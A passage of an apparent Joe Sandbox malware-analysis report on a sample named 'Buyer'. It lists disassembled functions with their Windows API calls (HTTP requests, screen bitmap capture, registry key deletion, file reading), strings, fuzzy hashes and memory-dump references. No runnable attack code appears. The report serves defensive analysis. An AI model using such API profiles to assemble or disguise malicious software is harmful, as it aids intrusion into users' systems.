                                                                                                    • Opcode Fuzzy Hash: d7ca250b6a46d612d9c96a00d823e3b7fcb83f31794e37840f4be1fdc8a4f765
                                                                                                    • Instruction Fuzzy Hash: F3713771A40205BFFB21AF28DC4AFEABF69FF05B68F144206F514661E1C7B59910E790
                                                                                                    Function 00FD73A4 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?,?), ref: 00FD74B6
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00FD752A
                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00FD754C
                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FD755F
                                                                                                    • DestroyWindow.USER32(?), ref: 00FD7580
                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F40000,00000000), ref: 00FD75AF
                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FD75C8
                                                                                                    • GetDesktopWindow.USER32 ref: 00FD75E1
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00FD75E8
                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FD7600
                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00FD7618
                                                                                                      • Part of subcall function 00F59B74: GetWindowLongW.USER32(?,000000EB), ref: 00F59B82
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                    • String ID: 0$tooltips_class32
                                                                                                    • API String ID: 2429346358-3619404913
                                                                                                    • Opcode ID: e92b54c80d31bea01349b6b3ccce8a33fa70a58cfc1565b2d742bd4481602412
                                                                                                    • Instruction ID: dcff29689b00fb895880ad95b2315c3bd9828454904cb92b8b08acd36428c797
                                                                                                    • Opcode Fuzzy Hash: e92b54c80d31bea01349b6b3ccce8a33fa70a58cfc1565b2d742bd4481602412
                                                                                                    • Instruction Fuzzy Hash: 2F717F71505344AFD721EF28C844FAA7BEAFB89314F18091EF9858B361E775E901EB11
                                                                                                    Function 00FD980A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00FD9833
                                                                                                      • Part of subcall function 00FD7D3F: ClientToScreen.USER32(?,?), ref: 00FD7D65
                                                                                                      • Part of subcall function 00FD7D3F: GetWindowRect.USER32(?,?), ref: 00FD7DDB
                                                                                                      • Part of subcall function 00FD7D3F: PtInRect.USER32(?,?,00FD9275), ref: 00FD7DEB
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00FD989C
                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00FD98A7
                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00FD98CA
                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FD9911
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00FD992A
                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00FD9941
                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00FD9963
                                                                                                    • DragFinish.SHELL32(?), ref: 00FD996A
                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00FD9A5D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                    • API String ID: 221274066-3440237614
                                                                                                    • Opcode ID: b2670279ef3b3f285c4fa26f5454bc1b0fd4c3e282359a03a29abd59429d2b8a
                                                                                                    • Instruction ID: 26d6467bed73b15230137bdaae4e40233ccd219dc4aa79cd90c55fbfc4f89faf
                                                                                                    • Opcode Fuzzy Hash: b2670279ef3b3f285c4fa26f5454bc1b0fd4c3e282359a03a29abd59429d2b8a
                                                                                                    • Instruction Fuzzy Hash: 8E61AE71508305AFC301EF64DC85D9FBBE9FF89750F00091EF991922A1DB74AA49EB52
                                                                                                    Function 00FBCBE5 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FBCC1F
                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00FBCC32
                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00FBCC46
                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00FBCC5F
                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00FBCCA2
                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00FBCCB8
                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FBCCC3
                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FBCCF3
                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00FBCD4B
                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00FBCD5F
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00FBCD6A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                    • Opcode ID: 034b95066f3d41bc0c81e4e2cc382ad131aca8a142b679670ca3c29d812b754b
                                                                                                    • Instruction ID: 556520a180b40000f5c1c3e76f93d7aac22cc4c213c6cfd0cb8fdf025162ed5a
                                                                                                    • Opcode Fuzzy Hash: 034b95066f3d41bc0c81e4e2cc382ad131aca8a142b679670ca3c29d812b754b
                                                                                                    • Instruction Fuzzy Hash: 23515BB5901608BFDB219F76CC48AEB7BBCFF08754F10842AF95996250D734D944AFA0
                                                                                                    Function 00FD8C5B Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00FD63F7,?,?), ref: 00FD8C7E
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8C8E
                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8C99
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8CA6
                                                                                                    • GlobalLock.KERNEL32(00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8CB4
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8CC3
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8CCC
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8CD3
                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8CE4
                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FE0C20,?), ref: 00FD8CFD
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00FD8D0D
                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00FD8D2D
                                                                                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00FD8D5D
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FD8D85
                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FD8D9B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3840717409-0
                                                                                                    • Opcode ID: f61f638f7a92a8fc69ec3e91b86c2bcf64a0221620e96f9eb908acdfb35886f9
                                                                                                    • Instruction ID: 144ee4f8c16c91199ab841f902a49c7d4237ded7ca5b0c2a9f86a8ee1d9ff7b9
                                                                                                    • Opcode Fuzzy Hash: f61f638f7a92a8fc69ec3e91b86c2bcf64a0221620e96f9eb908acdfb35886f9
                                                                                                    • Instruction Fuzzy Hash: 96414975601208BFDB119F65DC48EAE7BBAFF89761F14405AF906D72A0DB309902EB20
                                                                                                    Function 00FB1BA6 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 00FB1BEB
                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00FB1BF4
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FB1C00
                                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00FB1CE4
                                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 00FB1D40
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00FB1DF1
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00FB1E75
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FB1EC1
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FB1ED0
                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 00FB1F0C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                    • API String ID: 1234038744-3931177956
                                                                                                    • Opcode ID: 13e29baea9eccfdc74d2e6c76e489730d61a397997ccbbaee98754d1c1f52d71
                                                                                                    • Instruction ID: bd20893f64382943f05a84bd2364077fb9287fb7d13fbac8e28ef28537b3c0cc
                                                                                                    • Opcode Fuzzy Hash: 13e29baea9eccfdc74d2e6c76e489730d61a397997ccbbaee98754d1c1f52d71
                                                                                                    • Instruction Fuzzy Hash: 07D1F5B2A40115DBDB10EF66D894BE9BBB4FF05700F648455E805AB281CB38EC54FFA1
                                                                                                    Function 00FC2CE3 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 00FC2D5F
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00FC2D6F
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00FC2D7B
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00FC2D88
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00FC2DF4
                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00FC2E33
                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00FC2E57
                                                                                                    • SelectObject.GDI32(?,?), ref: 00FC2E5F
                                                                                                    • DeleteObject.GDI32(?), ref: 00FC2E68
                                                                                                    • DeleteDC.GDI32(?), ref: 00FC2E6F
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00FC2E7A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                    • String ID: (
                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                    • Opcode ID: 9ae8106149417da5b267b91ef95cbe57d3ee99348e5ffc79244af5ab1fa823a6
                                                                                                    • Instruction ID: cbc63590b2c56cfeccb064451ad5bd14543ed3d39918b559413c411d335628e2
                                                                                                    • Opcode Fuzzy Hash: 9ae8106149417da5b267b91ef95cbe57d3ee99348e5ffc79244af5ab1fa823a6
                                                                                                    • Instruction Fuzzy Hash: 9C61E275D0021AAFCF04CFA8CD85EAEBBB6FF48310F20851AE956A7250D774A941DF60
                                                                                                    Function 00FA503F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00FA507B
                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00FA50BD
                                                                                                    • _wcslen.LIBCMT ref: 00FA50CE
                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00FA50DA
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00FA510F
                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00FA5147
                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00FA5180
                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00FA51DA
                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00FA520C
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FA5284
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                    • String ID: ThumbnailClass
                                                                                                    • API String ID: 1311036022-1241985126
                                                                                                    • Opcode ID: 83798ad84b9c5a1b3dc0be903a7e96c53307554676da4df8bf8ab7623b6a1856
                                                                                                    • Instruction ID: 77d831bf4d224b8d410d5d2f9a33f5bb075de65ea57cd5e500754bae58c19c14
                                                                                                    • Opcode Fuzzy Hash: 83798ad84b9c5a1b3dc0be903a7e96c53307554676da4df8bf8ab7623b6a1856
                                                                                                    • Instruction Fuzzy Hash: 3A9111B1504B06AFDB04DF24C894BBAB7E9FF52B24F00451DFA8682180EB35ED55EB91
                                                                                                    Function 00FD93FA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FD9446
                                                                                                    • GetFocus.USER32 ref: 00FD9456
                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00FD9461
                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00FD9509
                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00FD95BB
                                                                                                    • GetMenuItemCount.USER32(?), ref: 00FD95D8
                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00FD95E8
                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00FD961A
                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00FD965C
                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FD968D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 1026556194-4108050209
                                                                                                    • Opcode ID: 3b95df8c46f387d1c3d91b5be3f1c717c881869dd51a330bc8f6802af20cf86e
                                                                                                    • Instruction ID: 2288553f452b46f55f17a986425c4baa880ffd7b9947313fb025e505437fb458
                                                                                                    • Opcode Fuzzy Hash: 3b95df8c46f387d1c3d91b5be3f1c717c881869dd51a330bc8f6802af20cf86e
                                                                                                    • Instruction Fuzzy Hash: 2B81E1719083019FD711CF64DC84A6B7BEAFF88324F18052AF98497391C7B1D901EBA1
                                                                                                    Function 00FAC631 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(010129B0,000000FF,00000000,00000030), ref: 00FAC6AD
                                                                                                    • SetMenuItemInfoW.USER32(010129B0,00000004,00000000,00000030), ref: 00FAC6E2
                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00FAC6F4
                                                                                                    • GetMenuItemCount.USER32(?), ref: 00FAC73A
                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00FAC757
                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00FAC783
                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00FAC7CA
                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FAC810
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FAC825
                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FAC846
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 1460738036-4108050209
                                                                                                    • Opcode ID: 75a2083aaeb7964897affb264947cb9f261c623d9c2ab251dd856286f6268b9e
                                                                                                    • Instruction ID: d4a81255490e0818c00b3ccba6cefecf9a3021e4aa5ac084e1cf312de1e6abf9
                                                                                                    • Opcode Fuzzy Hash: 75a2083aaeb7964897affb264947cb9f261c623d9c2ab251dd856286f6268b9e
                                                                                                    • Instruction Fuzzy Hash: 496180B190024AAFDF11CF68DD88AEE7BB9FB06354F144159E841A3251C779AD05EBE0
                                                                                                    Function 00FAE1EC Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00FAE1FE
                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00FAE224
                                                                                                    • _wcslen.LIBCMT ref: 00FAE22E
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00FAE27E
                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00FAE29A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                    • API String ID: 1939486746-1459072770
                                                                                                    • Opcode ID: 9bf76b7ca7a3d65edf6ab5dacb8252f5dc06f2349edbaac66037acf4a2f99325
                                                                                                    • Instruction ID: 45ac1bc118318747d508cb02224d01d3b93b93ad411ce914d73bdf5f281de5ae
                                                                                                    • Opcode Fuzzy Hash: 9bf76b7ca7a3d65edf6ab5dacb8252f5dc06f2349edbaac66037acf4a2f99325
                                                                                                    • Instruction Fuzzy Hash: B941E772A403047AEB05A7748C47EFF7BACDF56720F14406AF905A7182EB799A01B7B1
                                                                                                    Function 00FCD3B2 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00FCD3E2
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00FCD40B
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00FCD4C6
                                                                                                      • Part of subcall function 00FCD3B2: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00FCD428
                                                                                                      • Part of subcall function 00FCD3B2: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00FCD43B
                                                                                                      • Part of subcall function 00FCD3B2: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00FCD44D
                                                                                                      • Part of subcall function 00FCD3B2: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00FCD483
                                                                                                      • Part of subcall function 00FCD3B2: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00FCD4A6
                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00FCD471
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
